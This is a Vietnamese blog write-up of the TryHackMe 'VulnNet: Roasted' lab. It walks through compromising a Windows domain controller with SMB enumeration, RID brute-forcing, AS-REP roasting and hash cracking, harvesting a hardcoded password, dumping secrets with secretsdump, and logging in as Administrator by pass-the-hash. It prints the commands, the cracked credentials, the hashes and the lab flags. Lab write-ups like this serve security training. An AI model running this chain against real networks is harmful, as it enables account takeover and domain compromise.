Advertisement

Responsive Advertisement

Vu.ln.Net: Roaste.d - Tryhackme - Writeup

byBLOG LAB CTF October 18, 2021

 

Vu.lnN.et Ente.rtainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.

  • Difficulty: Easy
  • Operating System: Windows

This is a much simpler machine, do not overthink. You can do it by following common methodologies.

Note: It might take up to 6 minutes for this machine to fully boot.

  • Author: MindOverfløw
  • Discord: MindOverfløw#0420

Bước 1: Dò quét dịch vụ máy tấn công

Mình sử dụng công cụ nmap để dò quét thông tin

nmap -sV -sC -p- ip_victim
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-27 12:26:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49665/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49684/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49708/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-05-27T12:27:28
|_  start_date: N/A
Mình thấy rất nhiều cổng thấy một domain ở đây là vulnnet-rst.local mình khai báo trong file /etc/hosts 

Thấy có dịch vụ samba hoạt động mình dựa vào dịch vụ này để khai thác xem có lỗ hổng nào không nhé


Bước 2: Khai thác dịch vụ SAMBA

smbclient -L ip_victim
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    VulnNet-Business-Anonymous Disk      VulnNet Business Sharing
    VulnNet-Enterprise-Anonymous Disk      VulnNet Enterprise Sharing
SMB1 disabled -- no workgroup available
Mình thấu ở đây có cả chia sẻ ổ đĩa luôn, mình thấy có gì đặc biệt ở đây mình liền thử kiểm tra với quyền everyone :) xem sao

smbmap -u anonymous -H 10.10.117.62
  Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    ADMIN$                                              NO ACCESS   Remote Admin
    C$                                                  NO ACCESS   Default share
    IPC$                                                READ ONLY   Remote IPC
    NETLOGON                                            NO ACCESS   Logon server share 
    SYSVOL                                              NO ACCESS   Logon server share 
    VulnNet-Business-Anonymous                          READ ONLY   VulnNet Business Sharing
    VulnNet-Enterprise-Anonymous                        READ ONLY   VulnNet Enterprise Sharing

Có thể truy cập các chia sẻ (VulnNet-Business-Anonymous và VulnNet-Enterprise-Anonymous) nhưng chúng không lưu trữ bất kỳ tệp hữu ích nào.

Nhận thấy không có gì khả quan lắm. Mình tiếp tục dùng công cụ crackmapexec tìm kiếm thông tin user của hệ thống này

crackmapexec smb vulnnet-rst.local -u robot -p '' --rid-brute | grep  SidTypeUser


Thấy danh sách các user ở đây mình lưu lại một tệp tin users.txt, mình tiến hành sử dụng công cụ GetNPUsers.py để khai thác lấy thông tin hàm băm của mật khẩu user nào đó trong số user của tệp tin 

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip ip_victim -usersfile users.txt -no-pass vulnnet-rst.local/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST.LOCAL:692e76f70a8772c46ed94e73130460c8$713b0693498fdaff68642d78e713ca965e5007d5d864ca727289930783fe28f00bf79fef8126c4722d09cafc72ec60e940d31297591f67ce049030cb531ddd9c83cd37796fbf414b830a7c90fe26d2c45d6f2b624cd4413c58e3dbb77519dd69906248f8db27b1974b880a826003e562e25d9de9e4cb7cfa85c1de954761053b7d51a455530001348b46909f91f4e80bae7374071339f0920bb3e2ad95169d20f05d0cd586882facb63c058072dacb7ec8ddbcd9297331e1f6fb6d844ea7967659bee38fde4431af9f9608e9adcb38cb6e20e72bcf61c524f480b5ea2530e16dbeed2272855a61a05c03e84653aa1a3bbbd5ece06633
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
Mình thu được hàm băm mật khẩu của user t-skid

Mình tiến hành giải mã nó sử dụng johzipper

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tj072889*        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)
1g 0:00:00:04 DONE (2021-05-27 19:51) 0.2118g/s 673410p/s 673410c/s 673410C/s tj3929..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Sau khi có mật khẩu tiến hành đăng nhập smb để lấy thông tin dữ liệu thư mục NETLOGON

Enter VULNNET-RST.LOCAL\t-skid's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Mar 17 00:15:49 2021
  ..                                  D        0  Wed Mar 17 00:15:49 2021
  ResetPassword.vbs                   A     2821  Wed Mar 17 00:18:14 2021

        8540159 blocks of size 4096. 4318542 blocks available
smb: \> get ResetPassword.vbs -

cat  ResetPassword.vbs
Option Explicit

Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName

' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1

If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If

strUserNTName = "a-whitehat" <------------------------------------------ interesting
strPassword = "bNdKVkjv3RR9ht" <---------------------------------------- interesting

' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")

' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)

' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")

' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " &vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0

Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTNamegetting file \ResetPassword.vbs of size 2821 as - (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
Thu được một thông tin user và pass 

Bước 3: Leo thang

Sử dụng thông tin đó dùng kết hợp với công cụ evil-winrm

evil-winrm -i ip_victim -u a-whitehat -p "bNdKVkjv3RR9ht"

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\a-whitehat\Documents> cd \Users
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/27/2021  10:47 PM                a-whitehat
d-----        3/13/2021   3:20 PM                Administrator
d-----        3/13/2021   3:42 PM                enterprise-core-vn
d-r---        3/11/2021   7:36 AM                Public


*Evil-WinRM* PS C:\Users> cd enterprise-core-vn\Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> cat user.txt
THM{726b7c0baaac1455d05c827b5561f4ed}
Sau đó sử dụng secretdump.py để kết xuất hàm băm.

python3 secretsdump.py vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@ip_victim
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
VULNNET-RST\WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:e15c59ee8e198aca3629e33c3e97f37827faaab34f475c83b76ffa53f83d58e7
VULNNET-RST\WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:de131f2343b586e21ba7f0867671f397
VULNNET-RST\WIN-2BO8M1OE1M1$:des-cbc-md5:8ad94f8613101694
VULNNET-RST\WIN-2BO8M1OE1M1$:plain_password_hex:5c51fad41849d3187783c78cc334ff666a46a49248a10e81a894e0bf6e20219d775cc61d35e34d0ff6a6bb3a378026bfcdc979abc624d19b78b8f448ec263757628eb786b3d47a2e638ea70f99c9898237d12750541632540fe3b82507e7ae542e43b1f20e1ccb473af2abf1bd15b8a7990bb4c6250e1e85b12522ae9a0ba0cc04d5d8e4932eb366f6be58e84974cc817f2265e85dcfdd65a887d882cea77e22edb84e47523e11245605eb1ff867c68e966022b5918e1253e6b8908e5e25527dc8d0dfe12ffc83fe7ed3fa4216b13aff427b6e51984b6abc3960e3e353f1e0345dec4ae1b9fcceb64842dc310a20c983
VULNNET-RST\WIN-2BO8M1OE1M1$:aad3b435b51404eeaad3b435b51404ee:875ff956b083d37e2e80d256e36deece:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x20809b3917494a0d3d5de6d6680c00dd718b1419
dpapi_userkey:0xbf8cce326ad7bdbb9bbd717c970b7400696d3855
[*] NL$KM 
 0000   F3 F6 6B 8D 1E 2A F4 8E  85 F6 7A 46 D1 25 A0 D3   ..k..*....zF.%..
 0010   EA F4 90 7D 2D CB A5 8C  88 C5 68 4C 1E D3 67 3B   ...}-.....hL..g;
 0020   DB 31 D9 91 C9 BB 6A 57  EA 18 2C 90 D3 06 F8 31   .1....jW..,....1
 0030   7C 8C 31 96 5E 53 5B 85  60 B4 D5 6B 47 61 85 4A   |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a

[...]
Thu được hàm băm của user administrator mình đăng nhập bằng công cụ evil-winrm và đọc cờ cuối

evil-winrm -i ip_victim -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d"                           
Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:34 PM             39 system.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}
Tags

Post a Comment

0 Comments